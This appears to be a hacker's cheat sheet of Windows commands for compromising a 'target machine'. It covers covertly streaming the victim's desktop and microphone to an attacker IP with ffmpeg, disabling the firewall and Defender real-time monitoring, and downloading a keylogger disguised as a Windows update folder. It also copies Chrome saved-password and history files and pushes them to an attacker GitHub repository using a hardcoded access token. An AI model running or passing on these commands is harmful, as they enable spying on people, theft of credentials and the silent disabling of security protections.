==========================================================
===/////////  for listerners ffmpeg  ///////////////======
==========================================================
  screen ffmpeg -i udp://0.0.0.0:10001 /root/Download/livestream.avi

  for server ffmpeg target machine
  =======================================
  (video only)
  \ffmpeg.exe -f gdigrab -i desktop -f dshow -f avi udp://192.168.1.157:10001
  (audio only)
  .\ffmpeg.exe -f dshow -i audio="Microphone (Realtek High Definition Audio)" -f avi udp://192.168.1.157:10001
  (video & audio)
  .\ffmpeg.exe -f dshow -i audio="Microphone (Realtek High Definition Audio)":video="desktop" -f avi udp://192.168.1.157:10001
  
===========================
trun off windows firewalls 
===========================
  netsh advfirewall set allprofiles state off
  Set-MpPreference -DisableRealtimeMonitoring $true
  
====================
available disk show
====================
  wmic logicaldisk get name
  
======================================= 
downloading keylooger to target pc
======================================
  Invoke-WebRequest -Uri 'https://github.com/HAXORK8880/commands/blob/main/security.zip?raw=true' -OutFile $ENV:UserProfile'\WindowsUpdate\Windows32.zip'
 
 =======================
 Delete folder or items
 =======================
  Remove-Item Windows32 -Force  -Recurse -ErrorAction SilentlyContinue
  
 ===================================== 
 Setup working directory to target
 =====================================
 cd $ENV:UserProfile'
 mkdir WindowsUpdate
 cd WindowsUpdate
 mkdir security
 git init
 git remote add origin https://github.com/HAXORK8880/UploadServer.git
 Invoke-WebRequest -Uri 'https://github.com/HAXORK8880/commands/blob/main/security.zip?raw=true' -OutFile $ENV:UserProfile'\WindowsUpdate\Windows32.zip'
 Expand-Archive Windows32.zip
 cd Windows32
 cd graphics
 ./regedit.exe
 
 =============================================
 For collection password to working directory
 =============================================
 cd security
 mkdir profile
 Copy-Item -Path $ENV:UserProfile'\AppData\Local\Google\Chrome\User Data\Default\Login Data' -Destination $ENV:UserProfile'\WindowsUpdate\Windows32\security'
 Copy-Item -Path $ENV:UserProfile'\AppData\Local\Google\Chrome\User Data\Profile 3\Login Data' -Destination $ENV:UserProfile'\WindowsUpdate\Windows32\security\profile'
 Copy-Item -Path $ENV:UserProfile'\AppData\Local\Google\Chrome\User Data\Default\History' -Destination $ENV:UserProfile'\WindowsUpdate\Windows32\security'
 
 =====================
 git push from target
 ====================
 git clone https://hmdsazzad17@github.com/hmdsazzad17/codelab_amrokanon.git
 git pull origin main --allow-unrelated-histories
 git add .
 git commit -m "from target machine"
 git remote add origin https://github.com/HAXORK8880/UploadServer.git
 git remote set-url origin https://github.com/HAXORK8880/UploadServer.git
 git push https://HAXORK8880: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@github.com/HAXORK8880/UploadServer.git
